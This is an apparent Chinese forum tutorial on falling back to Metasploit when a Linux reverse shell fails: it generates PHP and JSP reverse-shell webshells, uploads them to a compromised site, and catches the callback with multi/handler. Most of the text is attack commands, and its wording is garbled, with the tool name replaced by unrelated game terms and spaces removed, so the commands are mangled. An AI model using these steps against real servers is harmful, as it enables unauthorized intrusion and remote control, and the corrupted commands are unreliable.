当LINUX提权反弹不了时Metasploit出击

当LINUX提权反弹不了时.经常遇到这种情况请出M游戏..

1.生成WEBSHELL文件

m单机传奇>m单机传奇payloadphp/reverse_phpLHOST=你的IPLPORT=端口R>dis9.php

我的BT4是在/ROOT/目录然后吧dis9.php加才能运行

把dis9.php传进你的SHELL里例如www.dis9.com/dis9.php

2.然后M游戏设置接口模板和参数

m单机传奇>usemulti/handler//进入multi/handler接口

m单机传奇exploit(handler)>setPAYLOADphp/reverse_php//写入模块不清楚的可以先infophp/reverse_php看看介绍

m单机传奇exploit(handler)>setLHOST你的IP//生成dis9.php的LHOST的IP也就是你的IP要一样

m单机传奇exploit(handler)>setLPORT8080//同上

m单机传奇exploit(handler)>exploit//执行

3.反弹SHELL

然后访问你的dis9.php

root@bt4:linkswww.dis9.com/dis9.php

这样就会反弹一个SHELL

我们就可以继续FUCKALL
/////////////////////////////////////////////////////////////////////////////////////////////////

JSP

m单机传奇payloadjava/jsp_shell_reverse_tcpLHOST=192.168.10.1R>balckrootkit.jsp

m单机传奇>useexploit/multi/handler

m单机传奇exploit(handler)>setPAYLOADjava/jsp_shell_reverse_tcp

setPAYLOADjava/jsp_shell_reverse_tcp

m单机传奇exploit(handler)>setLHOST192.168.10.1

LHOST=>192.168.10.1

——————————————————-

这里没SET端口默认的4444